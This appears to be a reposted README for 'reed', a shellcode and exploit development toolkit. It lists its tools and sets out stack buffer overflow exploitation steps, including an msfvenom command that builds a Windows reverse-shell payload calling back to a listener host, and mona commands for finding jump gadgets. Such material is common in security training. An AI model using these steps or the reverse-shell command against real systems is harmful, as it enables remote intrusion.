reed is a Reverse Engineering and Exploit Development stuff.

reed is a Reverse Engineering and Exploit Development stuff.

reed is a Reverse Engineering and Exploit Development stuff.
Latest Change 10/12/2015: Add shellcode execution frames in C#

Inside Folder :
– mans
– templates
– tools

sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.

sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.

List Of Tools:
+ sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.
+ scdisas: Tool for disassembling shellcode string.
+ scdump : Tool for dumping shellcode string from instructions of the .text (code) section of the given binary.
+ str4sc : Tool for converting string to instructions for pushing them to stack.
+ xorencoder : Tool for xoring shellcode with a given key (can be one or multiple bytes).

Exploit Development Step:
1. Fuzz it and have it crash with all A’s

2. Take control of EIP and one other register (ESP, EAX, etc.)
a. Use pattern_create $buffersize and pattern_offset $register_value

3. Find badchars
a. !mona bytearray -b “\x00” or use own Python algo (even better)

4. Generate the shellcode and insert it into the script
a. Remember to generate the shellcode excluding the bad chars! Example:
msfvenom -f python -b ‘\x00’ -p windows/shell_reverse_tcp LHOST=192.168.40.47 LPORT=443 EXITFUNC=thread > revshellwin.py
b. Remember to add at least 16 nops in front of the shellcode or it won’t work!

5. Find space for the shellcode
a. Try increasing buffer in necessary

6. Find instruction that will change the execution flow, e.g. JMP ESP / JMP EAX:
a. Use nasm_shell to obtain intrcution opcodes
b. First find module without ASLR and possible DEP protections:
!mona modules
c. Second find the instruction inside unprotected module, e.g.
!mona find -s “\xff\xe4” -m VulnServer.exe
d. Remember that the instruction address must not contain any bad chars!
e. Remember to revert the address in your code! E.g. 0x65d11d71 becomes “\x71\x1d\xd1\x65”

f. In more complex case when you control ESP but don’t have enough space and some other register (e.g. EAX)
doesn’t point exactly at the beginning of the controllable input you can write
add eax, $offset
jmp eax
instructions into ESP, and then put your shellcode into EAX+$offset

7. Test it.

Installation :
– git clone https://github.com/reider-roque/reed
– cd reed
– just run ./ at tool folder

Source: https://github.com/reider-roque